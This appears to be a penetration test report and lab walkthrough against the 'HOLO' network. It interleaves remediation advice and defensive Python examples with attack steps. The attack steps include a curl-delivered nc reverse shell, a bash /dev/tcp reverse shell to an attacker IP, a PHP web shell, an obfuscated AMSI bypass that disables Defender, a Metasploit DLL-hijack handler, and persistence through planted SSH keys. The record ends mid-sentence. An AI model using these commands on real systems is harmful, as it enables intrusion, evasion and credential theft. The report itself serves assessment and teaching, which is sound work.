BlackSunSecurity ExternalPenetrationTestReport HOLO v1.2
HOLOLIVE
v.1.2
Prepared By:
Lai Koon Fatt (Austin)
Black Sun Security
Confidentiality Statement
This document is the exclusive property of HOLO and Black Sun Security.
This document contains proprietary and confidential information. Duplication, redistribution, or use,
in whole or in part, in any form, requires consent of both HOLO and Black Sun Security.
Black Sun Security may share this document with auditors under non-disclosure agreements to
demonstrate penetration test requirement compliance.
DISCLAIMERS
The assessments are a “point in time” analysis and as such it is possible that something in the
environment could have changed since the tests reflected in this report were run. Also, it is
possible that new vulnerabilities may have been discovered since the tests were run.
For this reason, this report should be considered a guide, not a 100% representation of the risk
threatening your systems, networks, and applications.
Introduction | Purpose
HOLO has asked Black Sun Security to perform a detailed security examination of their corporate
network (hololive), which contains Active Directory (AD), a file server, a database and a web application.
This report is being presented to show the full results of our testing efforts and to make
recommendations where appropriate.
An external penetration test emulates the role of an attacker attempting to gain access to an
internal network without internal resources or inside knowledge.
The scope of this review was limited to a single corporate network given by HOLO - “hololive”.
Assessment Details
External Penetration Test
Network = 10.200.107.0/24
Domain = hololive
Our testing included unauthenticated testing to gain an initial foothold, followed by scanning and
enumeration to identify potential vulnerabilities for exploitation.
From there, we pivoted through the network to gain further access, eventually reaching the
Domain Controller (AD/DC).
BLACK SUN SECURITY evaluated HOLO's external security posture through an external network
penetration test combined with a "grey-box" web application assessment. The focus of this test is to
perform attacks like those of a real attacker and attempt to infiltrate the HOLO corporate network as
stated in the External Penetration Test Scope.
By leveraging a series of attacks, BLACK SUN SECURITY found two (2) critical, two (2) high and
two (2) medium severity vulnerabilities that together allowed full internal network access to the
HOLO corporate network.
BLACK SUN SECURITY has classified the vulnerabilities according to the Severity Classification
section and has compiled a Summary of Vulnerabilities for HOLO's reference.
It is highly recommended that HOLO address these vulnerabilities as soon as possible, as they are
easily found through basic reconnaissance and exploitable without much effort (low-hanging fruit).
The affected systems, together with a brief description of how access was obtained, are listed in the
Attack Summary.
BLACK SUN SECURITY has also included MITRE Adversarial Tactics, Techniques and Common
Knowledge (the MITRE ATT&CK Framework) in this penetration testing report. The framework is a
curated knowledge base and model of cyber adversary behavior, reflecting the various phases of an
adversary's attack lifecycle. It will allow HOLO to improve detection of adversaries in the enterprise,
better classify the attacks and assess the organization's risk.
Attack Summary
No. | Date | System | Description
1 | 3rd Sept 2021 | http://dev.holo.live | Obtained user account credentials through CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') by exploiting a Local File Inclusion vulnerability.
3 | 5th Sept 2021 | http://10.200.107.31 | Got in through CWE-640: Weak Password Recovery Mechanism for Forgotten Password by constructing a password reset poisoning attack to reset the password of a valid user account.
4 | 6th Sept 2021 | 10.200.107.35 | Got in through CWE-427: Uncontrolled Search Path Element by exploiting a vulnerable application found on the system.
Severity Definition
Critical: A vulnerability exists that allows an attacker elevated privilege on the system; however, exploitation may require extra steps.
High: … and/or could access the system directly. It is advised to form a plan of action and patch immediately.
Medium: … configuration. By exploiting these security issues, malicious attackers can access data on the system.
Low: Low severity includes information leakage, configuration errors and a lack of some security measures. They can be combined with other issues of a higher severity level and cause a more severe impact on the target.
Summary of Vulnerabilities
BLACK SUN SECURITY successfully performed local file inclusion and remote code execution and
uploaded malicious files to gain access to the system.
Recommendation
• Encourage HOLO to strengthen input validation for all web applications (especially for
hazardous characters), following the OWASP Secure Coding Best Practice v2.
• If possible, do not permit file paths to be appended directly. Make them hard-coded or selectable
from a limited hard-coded path list via an index variable.
• If dynamic path concatenation is needed, ensure only required characters such as "a-zA-Z0-9"
are accepted and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
• Additional Reference: Code Execution via Local File Inclusion
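The three recommendations above can be implemented together. The following Python example is added here and is not code from the report or from the HOLO application; the image list and directory it uses are hypothetical. It shows the preferred index-based selection beside a dynamic-name fallback that rejects "..", "/", "\" and "%00" and then checks the canonical path against the root:

```python
import os
import re

# Hypothetical values for this example: a fixed list of images the page may
# serve, and the directory they live in (not taken from the HOLO application).
ALLOWED_IMAGES = ("talent1.jpg", "talent2.jpg", "logo.png")
IMAGE_ROOT = os.path.realpath("/var/www/dev/images")

# A bare filename: letters, digits, "_" and "-", plus one extension. This
# excludes ".", "..", "/", "\\" and "%" (so "%00" never reaches the filesystem).
SAFE_NAME = re.compile(r"^[a-zA-Z0-9_-]+(\.[a-zA-Z0-9]+)?$")


class UnsafePath(ValueError):
    """Raised for any request the allow-list rejects."""


def resolve_by_index(idx: str) -> str:
    """Preferred scheme: the client sends an index, the server picks the path."""
    if not idx.isdigit() or int(idx) >= len(ALLOWED_IMAGES):
        raise UnsafePath("index not in allow-list")
    return os.path.join(IMAGE_ROOT, ALLOWED_IMAGES[int(idx)])


def resolve_dynamic(name: str, root: str = IMAGE_ROOT) -> str:
    """Fallback when a filename must be accepted: reject traversal tokens
    explicitly, then confirm the canonical path is still under root."""
    if "\x00" in name or "%00" in name:
        raise UnsafePath("null byte")
    if ".." in name or "/" in name or "\\" in name:
        raise UnsafePath("traversal sequence or separator")
    if not SAFE_NAME.fullmatch(name):
        raise UnsafePath("unexpected characters")
    full = os.path.realpath(os.path.join(root, name))
    # realpath() resolves symlinks too, so a symlinked entry pointing outside
    # root is caught here rather than by the string checks above.
    if os.path.commonpath([root, full]) != root:
        raise UnsafePath("resolved path escapes root")
    return full


def is_safe(name: str) -> bool:
    """Boolean wrapper around resolve_dynamic() for quick checks."""
    try:
        resolve_dynamic(name)
    except UnsafePath:
        return False
    return True
```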
BLACK SUN SECURITY successfully accessed files that should have been access-restricted and not
exposed to the external network, and used a binary with the SUID bit set to eventually escalate privileges to root.
Recommendation
• Implement the strict access control and data protection stated in the OWASP Secure Coding Best
Practice v2 to ensure sensitive information is not visible to unauthorized users.
• Impose strict file and directory permissions to restrict file access.
• Give the MySQL user the least permission needed to run the service and the minimum access
permission to the MySQL data.
• Remove any binary with the SUID bit, or at least do not grant the SUID bit to any binary that does not need it.
• Train employees on the correct use of robots.txt; it can represent good practice for non-security
reasons.
• Do not rely on robots.txt to provide any kind of protection against unauthorized access.
• Additional References: PortSwigger - Robots.txt file
During the assessment, BLACK SUN SECURITY performed multiple attacks against login forms
found on the external network. For all logins, unlimited attempts were allowed, which permitted an
eventual successful login on the HOLO admin portal.
Recommendation
• Restrict logon attempts to 3 logon failures
BLACK SUN SECURITY leveraged multiple attacks against HOLO login forms using valid
credentials. The use of multi-factor authentication would have prevented full access and required
BLACK SUN SECURITY to utilize additional attack methods to gain internal network access.
Recommendation
• Integrate multi-factor authentication services
During the assessment, BLACK SUN SECURITY successfully performed DLL injection into one of
the vulnerable applications to escalate privileges to administrator.
Recommendation
• Ensure any service path containing spaces is enclosed in double quotes.
• Remove or ensure all applications/software/OS are up to date.
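The first recommendation above (CWE-428, Unquoted Search Path) can be audited automatically. The Python below is an added example, not code from the report; it evaluates constructed ImagePath strings of the kind stored under the Services registry key or shown by "sc qc", flags unquoted paths that contain spaces, produces the quoted form, and lists the parent directories whose write permissions should be reviewed:

```python
import re
from typing import NamedTuple


class ServiceCheck(NamedTuple):
    name: str
    image_path: str
    vulnerable: bool
    fixed_path: str
    directories_to_review: tuple


# Constructed sample of (service name, ImagePath value) pairs, in the form
# found under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath or in
# "sc qc <name>" output. Names and paths are invented for this example.
SAMPLE_SERVICES = [
    ("GoodSvc", r'"C:\Program Files\Good Vendor\svc.exe" -k run'),
    ("BadSvc", r"C:\Program Files\Bad Vendor\Update Service\updater.exe"),
    ("BadSvcArgs", r"C:\Program Files\Bad Vendor\agent.exe -service"),
    ("SysSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ("Expanded", r"%SystemRoot%\system32\sppsvc.exe"),
]


def split_executable(image_path: str):
    """Return (executable, arguments). A quoted path ends at the closing quote;
    an unquoted one is taken up to the first token ending in .exe."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end], path[end + 1:].strip()
    m = re.match(r"(.*?\.exe)\b", path, re.IGNORECASE)
    if m:
        return m.group(1), path[m.end():].strip()
    return path, ""


def check_service(name: str, image_path: str) -> ServiceCheck:
    exe, args = split_executable(image_path)
    vulnerable = (" " in exe) and not image_path.strip().startswith('"')
    review = []
    if vulnerable:
        # For every path component that contains a space, the service control
        # manager first tries a truncated name in the parent directory (for
        # "C:\Program Files\..." it tries "C:\Program.exe"). Those parent
        # directories must not be writable by standard users.
        comps = exe.split("\\")
        for i in range(1, len(comps)):
            if " " in comps[i]:
                parent = "\\".join(comps[:i])
                review.append(parent + "\\" if i == 1 else parent)
        fixed = f'"{exe}"' + (f" {args}" if args else "")
    else:
        fixed = image_path
    return ServiceCheck(name, image_path, vulnerable, fixed, tuple(review))


def audit(services) -> list:
    """Run the check over every (name, ImagePath) pair."""
    return [check_service(n, p) for n, p in services]


def vulnerable_services(services) -> list:
    return [c.name for c in audit(services) if c.vulnerable]
```

On a live system the pairs would come from the registry or "sc qc" output; the logic is the same.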
During the assessment, BLACK SUN SECURITY successfully exploited an SMB session by abusing
NTLM relay, which allowed access to the Domain Controller.
Recommendation
• Enable SMB signing enforcement
Black Sun Security recommends patching the vulnerabilities identified during the testing to ensure
that an attacker cannot exploit these systems in the future. One thing to remember is that these
systems require frequent patching and, once patched, should remain on a regular patch program to
protect against additional vulnerabilities that are discovered later.
Black Sun Security utilized a widely adopted approach, in line with the Open Web Application
Security Project (OWASP), to perform penetration testing that is effective in testing how well the
Holo corporate environment is secured.
Below is a breakout of how Black Sun Security was able to identify and exploit the variety of
systems, including all individual vulnerabilities found.
Information Gathering
The information gathering portion of a penetration test focuses on identifying the scope of the
penetration test.
During this penetration test, Black Sun Security was tasked with exploiting the specific Holo
corporate network stated in the External Penetration Test Scope.
Based on the given scope of engagement for the Holo corporate network (10.200.107.0/24), Black
Sun Security performed a quick nmap scan to gather information on the available assets.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform the nmap network scan on 10.200.107.0/24 are listed below:
Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what
services are alive on a system or systems.
This is valuable for an attacker as it provides detailed information on potential attack vectors into a
system.
Understanding what applications are running on the system gives an attacker the information needed
before performing the actual penetration test. In some cases, some ports may not be listed.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform the nmap host scan on the target system are listed below:
Penetration
The penetration testing portion of the assessment focuses heavily on gaining access to a variety of
systems.
During this penetration test, Black Sun Security was able to successfully gain access to 5 out of 6
systems.
Black Sun Security identified a live host (10.200.107.33) from the nmap scan result in
Information Gathering and performed a detailed rustscan with the command shown below:
sudo rustscan -u 5000 -b 1900 -t 4000 --tries 2 --scan-order serial -a 10.200.107.33 -- -A -sVC --script=safe,default,discovery,version,vuln | sudo tee rustscan-full-result-10.200.107.33
From the rustscan result, the open ports on our target system are as below:
• TCP: 22, 80, 33060
Web Enumeration
In the meantime, let's fire up a gobuster directory search on our target system with the gobuster
command below:
From the rustscan result as well, we have a few details worth checking out:
• robots.txt; however, it does not contain useful information
• We got the hostname and domain: holo.live and www.holo.live
Let's add the hostname and domain of our target system to the hosts file on our attacker machine
using the command below:
sudo sed -i.bak '$a10.200.107.33 holo.live www.holo.live' /etc/hosts && cat /etc/hosts && ls -l /etc/hosts*
We also fire up a gobuster vhost scan to check whether additional sub-domains can be found, using the
command below:
It seems we found additional sub-domains; let's add them to the hosts file on our attacker
machine using the command below:
sudo sed -i.bak 's/$/ admin.holo.live dev.holo.live/' /etc/hosts && cat /etc/hosts && ls -l /etc/hosts*
Looking at the source of the talent page of dev.holo.live, we noticed a possible Local File
Inclusion vulnerability: "img.php?file=".
From here, we know we can probably retrieve files by exploiting a Local File Inclusion
vulnerability in PHP.
This allows us to try to retrieve "creds.txt", as shown below, which is listed in the "robots.txt" of
admin.holo.live, since a development environment is usually a replica of the production
environment.
System Affected:
• http://dev.holo.live
Remediation Owner:
• Web Application Developer
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used
on target system as listed below:
Web Enumeration
Once we log in, we check the source of "dashboard.php" and right away notice a PHP Remote Code
Execution (OWASP Command Injection) under the "visitors visited today" section; the Holo developer
has also left a comment there.
We use the curl command shown below to perform this exploit and get our reverse shell:
curl 'http://admin.holo.live/dashboard.php?cmd=nc%20-c%20bash%2010.50.103.20%2018888'
System Affected:
• http://admin.holo.live
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used
on target system as listed below:
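Both web findings so far (img.php?file= traversal and dashboard.php?cmd= command injection) leave a distinctive trace in web server access logs. The Python below is an added detection example, not part of the report; it runs over constructed combined-format log lines whose request shapes mirror the two findings (client addresses, timestamps and sizes are invented) and reports parameters that carry traversal sequences, null bytes or shell metacharacters, after unwrapping double URL-encoding:

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in combined log format for this example: the request
# shapes mirror the img.php?file= and dashboard.php?cmd= findings in this
# report; client addresses, timestamps and sizes are invented.
SAMPLE_LOG = """\
10.50.103.20 - - [03/Sep/2021:10:01:02 +0000] "GET /img.php?file=../../../../var/www/admin/creds.txt HTTP/1.1" 200 71 "-" "curl/7.74.0"
10.50.103.20 - - [03/Sep/2021:10:02:15 +0000] "GET /img.php?file=images/talent1.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
10.50.103.20 - - [05/Sep/2021:11:30:44 +0000] "GET /dashboard.php?cmd=nc%20-c%20bash%2010.50.103.20%2018888 HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.50.103.21 - - [05/Sep/2021:11:31:00 +0000] "GET /dashboard.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.50.103.22 - - [05/Sep/2021:11:32:09 +0000] "GET /img.php?file=..%252F..%252Fetc%252Fpasswd%00.jpg HTTP/1.1" 200 1200 "-" "python-requests/2.25"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r"\.\./|\.\.\\|\x00|/etc/|/proc/self")
SHELL_META = re.compile(r"[;&|`$]|\b(?:nc|bash|sh|cmd|powershell|curl|wget)\b")
# Parameter names that should never carry shell-like content at all.
CMD_PARAMS = {"cmd", "exec", "command", "run", "system"}


def decode_param(value: str) -> str:
    # parse_qsl already decoded once; decode twice more to unwrap double- and
    # triple-encoded payloads such as %252e%252e%252f.
    return unquote(unquote(value))


def analyse_line(line: str):
    """Return a finding dict for one log line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_param(raw)
        if TRAVERSAL.search(value):
            findings.append(("path_traversal", key, value))
        if key.lower() in CMD_PARAMS and SHELL_META.search(value):
            findings.append(("command_injection", key, value))
    if not findings:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": parts.path,
        "status": m.group("status"),
        "findings": findings,
    }


def scan_log(text: str) -> list:
    """Apply analyse_line() to every line and keep the hits, in log order."""
    return [r for r in map(analyse_line, text.splitlines()) if r]
```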
System Enumeration
Next, we enumerate the directories on the target system (/var/www/admin, the web hosting
directory) as shown below:
User.txt
Since this is a Docker container environment, and Docker often creates an internal Docker network to
connect different containers, we decided to check the network information of the current container
using the "ifconfig" command (though "db_connect.php" had already disclosed part of this
information).
We then checked the routing information using the "route -nv" command; the result is shown
below:
Let's perform a quick port scan of 192.168.100.1 leveraging the netcat binary available in the
current container, as shown below:
for port in {1..20000}; do timeout 2 nc -znv 192.168.100.1 $port 2>&1 | grep open ; done
From the port scan result, we know that there is a MySQL service running on 192.168.100.1, so we
may use the credentials found previously (db_connect.php) to log in to the MySQL server residing
on 192.168.100.1.
We can confirm this by checking whether a MySQL client connection is running in the current container
using the "ps -elf | grep mysql" command; the result is shown below:
show databases;
use DashboardDB;
• We use "show tables;" to see which tables are available in the "DashboardDB"
database; we found a user table and dumped the entire table, as shown
below:
As we have access to the MySQL server on 192.168.100.1, we can exploit the MySQL server to
escape the current Docker container and gain access to the host system.
Below are the actions we performed to escape the current Docker container and gain access to the host
system.
• Create a table named "hacker" under the active database, in this case
"DashboardDB". We could also create our own database; however, to ensure
access to the host system and keep a low profile, we use the currently active database.
• Then we use an "INSERT" statement to insert our PHP payload into the table just created.
o The PHP payload is shown in the code snippet below:
<?php $cmd=$_GET["cmd"];system($cmd);?>
• Next, we use a "SELECT" statement with the "outfile" feature to dump the PHP payload to a file.
• Last, we use the "curl" command (curl 192.168.100.1:8080/shell.php?cmd=whoami) to get the
response of our PHP script and ensure our PHP payload is working properly.
With the PHP script working, we can craft a reverse shell and get a callback from the host system to our
attacker machine.
First, we crafted a reverse shell bash script named "rev.sh" on our local attacker machine; you
may find this reference for reverse shell payloads.
Here is the Proof-of-Concept reverse shell payload used, as shown in the code snippet below:
#!/bin/bash
bash -i >& /dev/tcp/10.50.103.20/23333 0>&1
We serve the script from our attacker machine with the command below:
python3 -m http.server 80
In the meantime, we also spin up a netcat listener to catch the callback from the target host system, as
shown below with the netcat command in the code snippet:
Now, back in our Docker container, we use curl to make 192.168.100.1 fetch our reverse shell
script and execute it with bash.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
escape the Docker container environment on the target system are listed below:
Right away, we search for binaries with the setuid bit using the command below:
We notice an unusual docker binary with setuid; searching online, the reference at
https://gtfobins.github.io/gtfobins/docker/#suid shows that such a docker binary with the
setuid bit can be exploited to escalate privilege to root.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
escalate privilege to the root user on the target system are listed below:
First, we dump "/etc/passwd" and "/etc/shadow", as passwd and shadow are useful for us
to gain access to the system as well as to crack the passwords of valid users.
From "/etc/passwd", we know that there is one non-system user: "linux-admin".
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
dump "/etc/passwd" and "/etc/shadow" from the target system are listed below:
To gain persistent access to the system, we generated an SSH key on the attacker machine
and copied it to the target system.
The Proof-of-Concept payload used to generate the SSH key and insert it into the "authorized_keys" of the
"root" and "linux-admin" users is shown below.
Below is the result of inserting the created SSH key into the "root" user account on the target system:
We also created an additional user, just in case, as a secondary way to regain access to the
system.
The Proof-of-Concept payload used to create the user and change its password is shown below.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
create persistent access on the target system are listed below:
Password Cracking
Back on our attacker machine, as we have the shadow file, we can try to crack the passwords,
especially for the user called "linux-admin".
Here is the reference: Project 12: Cracking Linux Password Hashes with Hashcat.
The "test2.hccapx" file is the hash of the "linux-admin" user password from the shadow file:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
crack the user password from the shadow file are listed below:
However, from our first nmap result there was no other system available to us. Hence, we
decided to SSH back into 10.200.107.33, where we noticed an nmap binary is available.
We utilized nmap from 10.200.107.33 to perform a quick scan for live hosts using the command
below:
From the nmap network scan result, we know that there are several systems on the network:
• 10.200.107.31
• 10.200.107.32
• 10.200.107.35
• 10.200.107.30
From the rustscan results, the open ports on the four target systems are as below (one line per system):
• TCP: 80, 88, 135, 139, 389, 445, 3389
• TCP: 22, 80, 135, 139, 443, 445, 3306, 3389
• TCP: 135, 139, 445, 3389
• TCP: 80, 135, 139, 445, 3389
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform the nmap network scan on 10.200.107.0/24 and the nmap host scans are listed below:
Network Pivoting
Take note of all the nmap results: they show that all the other systems are Windows.
We confirmed that from our attacker machine we are unable to access any host other than
10.200.107.33.
With all the information we gathered, we can conclude that Holo designed their corporate network
with segmentation.
We will need to forward our attacker traffic into the Holo corporate network via the host system
we gained access to, 10.200.107.33.
We decided to use "sshuttle", a proxy tool that uses SSH to forward our attacker traffic via SSH on
10.200.107.33 to the Holo corporate network 10.200.107.0/24.
The command we used for sshuttle is below (note that the command is executed on our attacker
machine):
We check that the "sshuttle" process is running by issuing the command "sudo ps -elf | grep sshu", as shown
below:
After "sshuttle" is running, we can access port 80, the HTTP service of 10.200.107.31,
from our attacker machine.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
access 10.200.107.31 are listed below:
Web Enumeration
As 10.200.107.31 shows a login page, we decide to try to log in to it using the credentials found
previously (those we dumped from the database called "DashboardDB" on the MySQL server at
192.168.100.1).
Take note of the "Forgot Password" page, which we have not explored yet.
From the response of the login page, we know that gurag is a valid user.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
check the validity of the user on 10.200.107.31 are listed below:
Now we try to reset the password of "gurag", as it is a valid user that allows us to log in, as shown below:
Below are the request and response cookies from the password reset:
From the response cookies, we can retrieve the "user_token"; this is a weak password reset
mechanism falling under OWASP - Broken Authentication.
With the "user_token" visible, we are now able to craft a valid password reset link for our targeted
user "gurag":
curl 'http://10.200.107.31/password_reset.php?user=gurag&user_token=input_user_token_here'

# Example
curl 'http://10.200.107.31/password_reset.php?user=gurag&user_token=68d0f48756dc369c1f900efac880c7fc6935badc03adae50d207e8595f540439721b1af96d6d7efb87d56efa398ebd491859'
We then visit the password reset page again for user "gurag"; below is the response that allows us
to input a new password for "gurag":
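Two weaknesses combine here: the login page confirms which usernames exist, and the reset handler returns the reset token to the requester. The Python below is an added example of the server-side design that closes both, not code from the report or from the 10.200.107.31 application (the URL it builds is hypothetical): the reply to a reset request is identical for known and unknown users, the token is generated from the OS CSPRNG and only its hash is stored, and redemption is time-limited, single-use and compared in constant time:

```python
import hashlib
import hmac
import secrets
import time

RESET_TTL = 15 * 60  # assumed policy: a link is valid for 15 minutes

# Same wording for existing and non-existing accounts, so the page cannot
# be used to confirm which usernames are valid.
GENERIC_REPLY = "If that account exists, a reset link has been sent to its e-mail address."


class ResetStore:
    """Server-side record per user: [sha256 of token, expiry, used flag].
    Only the hash is kept, so neither the database nor any response to the
    requester ever contains a redeemable token."""

    def __init__(self):
        self._records = {}

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, user: str, known_users, now=None) -> tuple:
        """Return (reply shown to the requester, link to e-mail or None).
        The link goes to the account's mailbox, never into the HTTP response."""
        now = time.time() if now is None else now
        if user not in known_users:
            return GENERIC_REPLY, None
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._records[user] = [self._digest(token), now + RESET_TTL, False]
        # Hypothetical URL for this example; the handler name is not the report's.
        link = f"https://www.example.com/reset?user={user}&token={token}"
        return GENERIC_REPLY, link

    def redeem(self, user: str, token: str, now=None) -> bool:
        """True only for an unexpired, unused token matching the stored hash."""
        now = time.time() if now is None else now
        rec = self._records.get(user)
        if rec is None:
            return False
        stored, expiry, used = rec
        if used or now > expiry:
            return False
        if not hmac.compare_digest(stored, self._digest(token)):
            return False
        rec[2] = True  # single use: a replayed link must fail
        return True


def token_from_link(link: str) -> str:
    """Helper used by the checks: pull the token back out of the e-mailed link."""
    return link.rsplit("token=", 1)[1]
```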
Web Flag
Once we input our new password for the user "gurag", we get another flag, as shown below:
Remediation Owner:
• Web Application Developer
Below is the home page, which allows us to upload an image after login.
We checked the "upload.js" JavaScript; below is what we found interesting. Basically, it
allows us to upload anything to 10.200.107.31:
With unrestricted file upload, we can craft a PHP reverse shell and upload it to 10.200.107.31, which
will give us access to the system; refer to this link for PHP Reverse Shell.
The specific Proof-of-Concept payload used in the PHP reverse shell is shown in the code
snippet below:
After uploading to 10.200.107.31 via the upload page, it shows a successful upload message, as below:
System Affected:
• 10.200.107.31
Remediation Owner:
• Web Application Developer
• System Owner
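The upload handler above accepts any file and keeps the client's filename, which is what made "rev.php" reachable under /images/. As an added example of the server-side validation that would have blocked it (not code from the report or from the HOLO application; the size limit is an assumed policy), the Python below allows only image extensions, requires the file signature to match the extension, rejects multi-extension and traversal names, and stores the file under a random server-chosen name:

```python
import os
import re
import secrets

# Allowed extensions and the file signatures each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumed policy
# Exactly one extension: "rev.php.jpg" and "rev.jpg.php" both fail this.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)")


class RejectedUpload(ValueError):
    pass


def validate_upload(client_name: str, data: bytes) -> str:
    """Return the server-chosen filename to store data under, or raise.
    The client's name is used only to read the extension; the stored name
    is random, so a name like "rev.php" never reaches the web root."""
    if not data or len(data) > MAX_BYTES:
        raise RejectedUpload("empty or oversized upload")
    base = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in base:
        raise RejectedUpload("null byte in filename")
    m = NAME_RE.fullmatch(base)
    if not m:
        raise RejectedUpload("filename must be name.ext with a single extension")
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension .{ext} not allowed")
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        raise RejectedUpload("content does not match declared image type")
    # Store under a random name; the upload directory must also have script
    # execution disabled in the web server configuration.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(client_name: str, data: bytes) -> bool:
    """Boolean wrapper around validate_upload() for quick checks."""
    try:
        validate_upload(client_name, data)
    except RejectedUpload:
        return False
    return True
```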
We access the directory found, and the reverse shell PHP file is inside.
Next, we spin up a netcat listener on our attacker machine and use the curl command to activate the
PHP reverse shell we uploaded to 10.200.107.31:
curl http://10.200.107.31/images/rev.php
Below is the reverse shell callback received on our attacker machine:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain reverse shell access on 10.200.107.31 are listed below:
Right away, we know this is a Windows system, and we check basic information as below:
Below is the Proof-of-Concept payload we used for the tasks mentioned above.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
create persistent access on 10.200.107.31 are listed below:
Defense Evasion
As we are working with a Windows system, we also use the PowerShell commands below to bypass
Windows AMSI; this allows us to run commands or execute tools without triggering the Windows
anti-malware system.
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
bypass Windows AMSI on 10.200.107.31 are listed below:
Root.txt
As we are working on a Windows system, we uploaded popular tools such as "mimikatz"
to dump the 10.200.107.31 system hashes, using the PowerShell command below:
Next, we run the command below to dump all available credential information and hashes, such as
NTLM, via mimikatz.
Right away, in the mimikatz result, we found a clear-text credential for one of the users (watamet)
on the system, as shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
dump NTLM hashes on 10.200.107.31 are listed below:
Lateral Movement
We tried the credentials found on the different systems; only 10.200.107.35 is accessible, as
shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
access 10.200.107.35 are listed below:
User.txt
As we are logged in to 10.200.107.35 as the "watamet" user, which does not have local administrator
rights on the system, we are unable to execute commands that require admin privilege.
We decided to use an AppLocker bypass checker (downloaded on our attacker machine) to
check whether the system has AppLocker enabled, as most Windows systems do, and to find a folder
that is accessible without restriction.
We execute the PowerShell command below to download the AppLocker bypass checker from our
attacker machine:
To be safe, we downloaded the AppLocker bypass checker into "C:\Windows\Tasks", the
folder used by Windows Scheduled Tasks.
Next, we run the following PowerShell command to start the AppLocker bypass checker:
.\applocker-bypas-checker.ps1
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
bypass Windows AppLocker on 10.200.107.35 are listed below:
From here, we can confirm that "C:\Windows\Tasks" is safe for us to execute commands and tools from.
Now, we start to enumerate the system and find a very interesting application
(kavremover.exe) at "C:\Users\watamet\Applications\", as shown below, which is an unusual path for a
program.
First, we create a malicious DLL embedding a Meterpreter reverse shell module from Metasploit
for the vulnerable application, using msfvenom on our attacker machine as per the command below.
Then we use the same "Invoke-WebRequest" PowerShell command to download the malicious
DLL from our attacker machine to the target system under "C:\Windows\Tasks", as shown below:
Next, we set up the Metasploit multi/handler module on our attacker machine as below:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.50.103.20
set LPORT 16666
run -j
To ensure the malicious DLL is loaded, we use the command line to start the application; it prompts
the error below, however the Meterpreter session is established.
System Affected:
• 10.200.107.35
Remediation Owner:
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
exploit DLL hijacking on 10.200.107.35 are listed below:
As we are using Meterpreter, we need to inject the Meterpreter process into a system process to have
better and more stable shell access; below is what we did to get a stable shell.
First, we execute the "getsystem" command in Meterpreter to temporarily escalate our privilege
to "NT AUTHORITY\SYSTEM".
Next, we use the "ps" command to get the list of processes running on 10.200.107.35, as shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain a stable shell on 10.200.107.35 are listed below:
Once done, we can execute the "shell" command to have command line access on 10.200.107.35.
We perform the same technique to gain persistent access to the system that was done on
10.200.107.31.
Besides, we execute the command below to check whether the system is domain-joined and to list domain users:
The result shows that the current system, 10.200.107.35, is joined to the HOLOLIVE domain and the domain
server is "DC-SRV01" (the mimikatz result shows the same).
We decided to attack the "DC-SRV01" domain server (10.200.107.30) using an NTLM relay attack,
after researching possible exploitable SMB vulnerabilities. References:
